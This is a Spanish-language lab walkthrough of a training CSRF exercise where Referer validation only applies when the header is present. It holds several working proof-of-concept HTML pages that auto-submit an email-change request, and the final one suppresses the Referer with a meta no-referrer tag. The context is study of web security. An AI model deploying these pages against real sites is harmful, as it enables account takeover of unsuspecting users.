11 - CSRF where Referer validation depends on header being present

El clásico CSRF tira "Invalid referer header"

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a1200a8043a9d448163399400e50074.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="test5555&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Enviando manualmente una cabecera referrer (no funciona porque los navegadores bloquean cabeceras referrer establecidas en formularios)

<html>
  <body>
    <script>
      fetch("https://0a1200a8043a9d448163399400e50074.web-security-academy.net/my-account/change-email", {
        method: "POST",
        headers: {
          "Content-Type": "application/x-www-form-urlencoded",
          "Referer": "https://0a1200a8043a9d448163399400e50074.web-security-academy.net/my-account"
        },
        body: "email=test444%40test.com",
        credentials: "include"
      });
    </script>
  </body>
</html>

En su lugar añadir la propiedad referrerpolicy="no-referrer" :
No parece funcionar

<html referrerpolicy="no-referrer">
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a1200a8043a9d448163399400e50074.web-security-academy.net/my-account/change-email" method="POST" referrerpolicy="no-referrer">
      <input type="hidden" name="email" value="test50000&#64;test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Pero <meta name="referrer" content="no-referrer"> si

Combinamos ambas por si acaso :

<html>
  <head>
    <meta name="referrer" content="no-referrer">
  </head>
  <body>
    <form action="https://0a1200a8043a9d448163399400e50074.web-security-academy.net/my-account/change-email" method="POST" referrerpolicy="no-referrer">
      <input type="hidden" name="email" value="aaaaaaaaaaaaaaaaa@test.com" />
      <input type="submit" value="Submit" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>